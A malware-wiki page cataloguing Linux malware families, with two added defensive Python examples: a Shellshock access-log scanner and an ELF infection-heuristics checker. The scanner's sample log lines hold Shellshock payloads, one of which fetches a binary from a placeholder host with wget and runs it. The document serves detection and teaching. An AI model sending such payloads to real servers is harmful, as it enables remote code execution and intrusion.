malwarewikiaorg-20200223-history
Linux
Linux is a Unix-like and mostly POSIX-compliant computer operating system assembled under the model of free and open-source software development and distribution, first released on October 5, 1991 by Linus Torvalds. The defining component of Linux is the Linux kernel. Although Linux is for the most part open-source, some proprietary software is available for it. Its death screen is the kernel panic.

Due to its relatively low desktop market share over the years and its stricter default privilege separation, far less malware has been written for Linux than for Windows. Most Linux malware targets web servers and large organizations, because Linux is the dominant platform for servers and website hosting. Nevertheless, the idea that Linux is completely malware-free is a tired rumor and simply incorrect. Cross-platform malware is becoming more common (widely used frameworks such as the .NET Framework and Qt are themselves cross-platform), and malware writers now target Linux on the desktop more frequently. Android, which is built on the Linux kernel, is also one of the most targeted platforms in the world. Some malware (such as Remaiten) is built for other architectures as well (such as ARM or MIPS), because so much of it is aimed at routers and IoT devices.

Threats
Below is a small list of known Linux malware. It mostly contains the most significant threats on the platform, although some of them no longer work or are no longer maintained. The tags in parentheses give the CPU architectures each sample was built for.

Botnets
*Mayhem (x86, amd64) - A multifunctional botnet that works on Linux and FreeBSD. It was most prominent in October 2014, when it spread to thousands of web servers using the Shellshock vulnerability.
*Remaiten (x86, mips, mipsel, armeabi, armebeabi) - A botnet that mostly targeted vulnerable routers and IoT devices.

Rootkits
*Snakso-A (amd64) - A 64-bit Linux web server rootkit that injects iframes into the pages the server delivers.
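Mayhem reached web servers by sending Shellshock payloads in HTTP request fields, so the first place a defender looks for it is the web server's access log. The following scanner is an added example written for this page, not code from the wiki or from any of the malware families described: it parses Apache/Nginx "combined" format lines, URL-decodes the request line, Referer and User-Agent once, and flags the `() {` function-definition prefix that every Shellshock exploit string begins with. The log lines are constructed for the example (the addresses are documentation ranges, not real attackers).

```python
import re
from urllib.parse import unquote

# Apache/Nginx "combined" log format: ip - user [time] "request" status size "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Shellshock payloads start with an empty function body "() {" followed by commands.
# Tools vary the whitespace, so allow any run of blanks between "()" and "{".
SHELLSHOCK = re.compile(r"\(\)\s*\{")


def shellshock_hits(lines):
    """Return (ip, field, decoded_value) for every line carrying a Shellshock-style
    payload in the request line, Referer or User-Agent."""
    hits = []
    for line in lines:
        m = COMBINED.match(line.strip())
        if not m:
            continue  # not combined format; a real deployment would count these
        for field in ("request", "referer", "agent"):
            value = unquote(m.group(field))  # one round of URL decoding
            if SHELLSHOCK.search(value):
                hits.append((m.group("ip"), field, value))
    return hits


# Constructed sample lines (not real traffic): two attacks, two benign requests.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Sep/2014:10:13:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    '"() { :;}; /bin/bash -c \'wget http://192.0.2.9/x -O /tmp/x; chmod +x /tmp/x; /tmp/x\'"',
    '198.51.100.7 - - [25/Sep/2014:10:14:22 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 200 '
    '"%28%29%20%7B%20%3A%3B%7D%3B%20id" "Mozilla/5.0"',
    '192.0.2.44 - - [25/Sep/2014:10:15:00 +0000] "GET /index.html HTTP/1.1" 200 3024 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
    # braces alone are not a payload; the "()" prefix is what matters
    '192.0.2.45 - - [25/Sep/2014:10:15:09 +0000] "GET /docs/{} HTTP/1.1" 404 120 "-" "curl/7.37.0"',
]

if __name__ == "__main__":
    for ip, field, value in shellshock_hits(SAMPLE_LOG):
        print(f"{ip}: Shellshock payload in {field}: {value!r}")
```

A hit only shows that an exploit was attempted; whether the CGI handler actually passed the header to a vulnerable bash is a separate question, answered by checking the bash version on the host and looking for the downloaded stage (here `/tmp/x`) and its outbound connections.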
Trojans
*Effusion (x86, amd64) - A 32/64-bit injector for web servers running Apache and Nginx. Discovered in 2014.
*Hand of Thief (x86, amd64) - A banking trojan for Linux discovered in 2013, mostly ineffective because it relies entirely on the user running the file by hand.
*Kaiten (x86, amd64) - A backdoor trojan that connects to an IRC channel so that attackers can remotely control the infected computer, mostly used for DDoS attacks.
*Turla (x86) - A trojan package that targets the Linux operating system. Although never confirmed, it is suspected to have been written by the Russian government for use against other governments and militaries since at least 2008.
*Rexob (x86) - Backdoor trojan.
*Tsunami (x86, amd64) - Active botnet trojan that targets Linux systems, mostly used for DoS attacks.
*Waterfall screensaver - This malware has no official name. It spread via gnome-look.org in 2009 and was used for denial-of-service attacks against a website called MMOwned, which provides exploits for popular MMORPGs. It was removed from the site shortly after it was discovered. It only targeted Debian-based systems.

Viruses
*42 (x86) - Open-source virus which uses CRC32 instructions for decryption.
*Arches (x86) - Open-source virus that infects ELF files.
*Alaeda (x86, amd64) - A virus that infects other binaries in the same directory.
*Binom (x86, amd64) - A virus that infects other binaries in a similar manner to Alaeda. Requires root.
*Bliss (x86) - A virus from 1997 that is speculated to be a proof of concept rather than a real-world virus. Requires root privileges. Debian Linux is still vulnerable to it, but because root privileges are required the risk is minimal. To disinfect files, run the infected binary with the "--bliss-uninfect-files-please" option.
*Brundle (also known as Brundle-Fly) (x86) - An open-source research virus, which has its own website and uninstaller.
*Bukowski (x86) - A research virus meant to show that current popular approaches to software security (DAC, VMA randomization and others) are not sufficient and that other approaches should be taken seriously. It also has its own website.
*Caveat (x86) - Open-source virus.
*Coin (x86) - Open-source virus.
*Diesel (x86) - A file-infecting virus similar to Alaeda and Binom. Discovered in 2002.
*Hasher (x86) - Open-source virus.
*Kagob.a (x86) - File infector virus.
*Kagob.b (x86) - File infector virus.
*Lacrimae (x86) -
*Lindose (also known as PEElf and Winux) (x86) - The first cross-platform virus able to infect both Microsoft Windows and Linux computers. It was never in the wild and was only a proof of concept.
*Linux.Encoder.1 (also known as Trojan.Linux.Ransom.A) (x86, amd64) - Ransomware trojan targeting computers running Linux, and the first ransomware trojan discovered on Linux. Discovered on November 5, 2015. Infected several thousand websites.
*MetaPHOR (also known as Simile) (x86, amd64) -
*Nuxbee (x86) - Fairly harmless, non-memory-resident parasitic Linux virus. It searches for ELF files in the bin directory, then writes itself into the middle of each file. Discovered in December 2001. Requires root.
*OSF.8759 (x86) - Dangerous virus that infects every file it can find in a directory, and also infects system files if run as root. It also installs a backdoor on the system. Discovered in 2002.
*Podloso (also known as the "iPod virus") (x86) -
*Rike (x86) -
*RST (x86) - Most prominent for infecting Korean releases of Mozilla Suite 1.7.6 and Thunderbird 1.0.2 in September 2005. It installs a backdoor on the system.
*Satyr (x86) - Harmless, non-memory-resident parasitic Linux virus. It searches for other ELF files on the system and infects them.
*Staog (x86) - The first virus ever written for Linux, in 1996. It was notable for exploiting kernel vulnerabilities to stay resident and infect binaries. It was written in assembly by the hacker group VLAD.
*Vit (x86) - ELF virus from 2000.
*Winter (x86) - Smallest known Linux virus that infects ELF files.
*Wit (x86) - Most likely another proof-of-concept virus.
*Zariche (x86) -
*ZipWorm (x86) - Spreads by infecting .zip files.

Worms
*Adm (x86) - Network worm from 2001 that exploited a buffer overrun. It scans computers on the network for open ports, attempts the attack, infects web pages hosted on the compromised system and propagates further.
*Adore (x86) - An infected computer scans the network for DNS, FTP and printer servers and infects them by various methods. A backdoor is installed, and the worm propagates itself. From 2001.
*Bad Bunny (x86) - Discovered in 2007, it is a cross-platform computer worm written in several scripting languages and distributed as an OpenOffice.org document containing a macro written in StarBasic. It runs badbunny.js under Microsoft Windows, badbunny.pl under Linux and badbunny.rb under Mac OS X, and displays a message box and a pornographic image when successfully run.
*Cheese (x86) - Used a backdoor installed by another worm. Cheese then removed that backdoor and propagated.
*Devnull (x86) - Computer worm (named after /dev/null) that executes a shell script, connects to an IRC server and waits for commands.
*Kork (x86) - Worm that only targets Red Hat Linux 7.0. It downloads files that no longer exist, so the worm no longer works.
*Lion (or L10n) (x86) - Worm that was active in 2001 but no longer works.
*Darlloz (several) - Worm that targets home routers, set-top boxes, security cameras, industrial control systems and other IoT devices.
*Lupper (x86) -
*Mighty (x86) - Appeared in 2002 and used a vulnerability in Apache; it also installed a backdoor and joined an IRC botnet.
*Millen (x86) - This worm replicated to Linux systems on Intel platforms and used remote exploits against four different servers to spread to vulnerable computers. On successfully exploiting a system it spawned a shell to retrieve the mworm.tgz package via FTP, then unpacked it into a directory literally named "..." under /tmp (a name chosen because it does not stand out in a casual directory listing). The worm also opened a backdoor on port 1338, offering a remote shell to any attacker connecting to that port.
*Ramen (x86) - Worm that only targeted Red Hat systems.
*Slapper (x86) - Used the same vulnerability as the Mighty worm and operated similarly.
*SSH Bruteforce (x86) - Worm that has no official name. It was never released into the wild but was in alpha testing in 2007.

References
https://en.wikipedia.org/wiki/Linux

Category:Operating systems
Category:Linux
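The parasitic file infectors listed under Viruses above (Alaeda, Binom, Diesel, Nuxbee, Satyr, Staog and others) all work the same way: they copy their own code into an existing ELF executable and redirect its entry point so the parasite runs before the host program. The code below is an added example written for this page, not code from the wiki or from any of those viruses. It parses the ELF64 header, program headers and section headers with nothing but the `struct` module and applies three heuristics that catch a naive appending infector: an entry point outside any executable segment, an entry point that no executable section covers (an infector that stretches a segment rarely adds a section), and unmapped bytes trailing the file. The sample images are constructed in memory for the example; the "parasite" is just padding plus an `exit(0)` stub, and the `build_sample` helper and its `stretch` flag are this example's own.

```python
import struct
from dataclasses import dataclass

# Constants from the ELF specification (little-endian ELF64 only, enough for x86-64)
ELF_MAGIC = b"\x7fELF"
PT_LOAD = 1
PF_X = 0x1
SHF_EXECINSTR = 0x4
EHDR_FMT = "<16sHHIQQQIHHHHHH"  # Elf64_Ehdr, 64 bytes
PHDR_FMT = "<IIQQQQQQ"          # Elf64_Phdr, 56 bytes
SHDR_FMT = "<IIQQQQIIQQ"        # Elf64_Shdr, 64 bytes


@dataclass
class Elf:
    entry: int
    segments: list   # (p_type, p_flags, p_offset, p_vaddr, p_filesz, p_memsz)
    sections: list   # (sh_flags, sh_addr, sh_size)
    shdr_end: int    # file offset just past the section header table (0 if none)


def parse_elf64(data: bytes) -> Elf:
    if data[:4] != ELF_MAGIC or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    f = struct.unpack_from(EHDR_FMT, data, 0)
    e_entry, e_phoff, e_shoff = f[4], f[5], f[6]
    e_phentsize, e_phnum, e_shentsize, e_shnum = f[9], f[10], f[11], f[12]
    segments = []
    for i in range(e_phnum):
        p = struct.unpack_from(PHDR_FMT, data, e_phoff + i * e_phentsize)
        segments.append((p[0], p[1], p[2], p[3], p[5], p[6]))
    sections = []
    for i in range(e_shnum):
        s = struct.unpack_from(SHDR_FMT, data, e_shoff + i * e_shentsize)
        sections.append((s[2], s[3], s[5]))
    shdr_end = e_shoff + e_shnum * e_shentsize if e_shnum else 0
    return Elf(e_entry, segments, sections, shdr_end)


def infection_signs(data: bytes) -> list:
    """Three cheap heuristics for an appended parasite. Empty list = nothing suspicious."""
    elf = parse_elf64(data)
    loads = [s for s in elf.segments if s[0] == PT_LOAD]
    found = []
    # 1. A sane entry point lives inside an executable PT_LOAD segment.
    if not any(fl & PF_X and va <= elf.entry < va + memsz for _, fl, _, va, _, memsz in loads):
        found.append("entry point outside every executable PT_LOAD segment")
    # 2. Infectors that stretch a segment rarely add a section, so the entry point ends
    #    up in no SHF_EXECINSTR section. Only meaningful when a section table exists.
    if elf.sections and not any(fl & SHF_EXECINSTR and a <= elf.entry < a + sz
                                for fl, a, sz in elf.sections):
        found.append("entry point not inside any SHF_EXECINSTR section")
    # 3. Bytes no segment maps and that lie past the section table are not needed to
    #    run the program: a payload store or a parasite that was appended but not mapped.
    covered = max([off + fsz for _, _, off, _, fsz, _ in loads] + [elf.shdr_end])
    if len(data) > covered:
        found.append(f"{len(data) - covered} trailing bytes beyond every segment and the section table")
    return found


# --- constructed sample images for the example (not real malware) -------------------
BASE = 0x400000
CODE = bytes.fromhex("4831ffb83c0000000f05")  # xor edi,edi; mov eax,60; syscall -> exit(0)


def build_sample(infected: bool, stretch: bool = True) -> bytes:
    """Minimal static ELF64: one RX PT_LOAD, a null section and a .text section.
    infected=True appends a parasite after the section table and points the entry at it.
    stretch=True also grows the segment so the parasite is mapped (what a working
    infector must do); stretch=False leaves the segment alone (a sloppy one)."""
    code_off = 64 + 56
    shoff = code_off + len(CODE)
    body_end = shoff + 2 * 64
    parasite = b"\x90" * 8 + CODE if infected else b""
    total = body_end + len(parasite)
    mapped = total if stretch else body_end
    entry = BASE + (body_end if infected else code_off)
    ident = b"\x7fELF\x02\x01\x01" + b"\x00" * 9  # ELF64, little-endian, version 1
    ehdr = struct.pack(EHDR_FMT, ident, 2, 62, 1, entry, 64, shoff, 0, 64, 56, 1, 64, 2, 0)
    phdr = struct.pack(PHDR_FMT, PT_LOAD, PF_X | 0x4, 0, BASE, BASE, mapped, mapped, 0x1000)
    sh_null = struct.pack(SHDR_FMT, *([0] * 10))
    sh_text = struct.pack(SHDR_FMT, 0, 1, 0x2 | SHF_EXECINSTR, BASE + code_off,
                          code_off, len(CODE), 0, 0, 16, 0)  # SHT_PROGBITS, ALLOC|EXECINSTR
    return ehdr + phdr + CODE + sh_null + sh_text + parasite


if __name__ == "__main__":
    for name, image in (("clean", build_sample(False)),
                        ("infected", build_sample(True)),
                        ("infected, sloppy", build_sample(True, stretch=False))):
        print(f"{name}: {infection_signs(image) or 'no findings'}")
```

These checks are heuristics, not a signature: a careful infector can also forge a matching section header, and a stripped-and-sstripped binary has no section table at all, so on a real host they belong next to the package manager's own integrity check (`rpm -V` or `debsums`), which compares every installed binary against the hash recorded at install time.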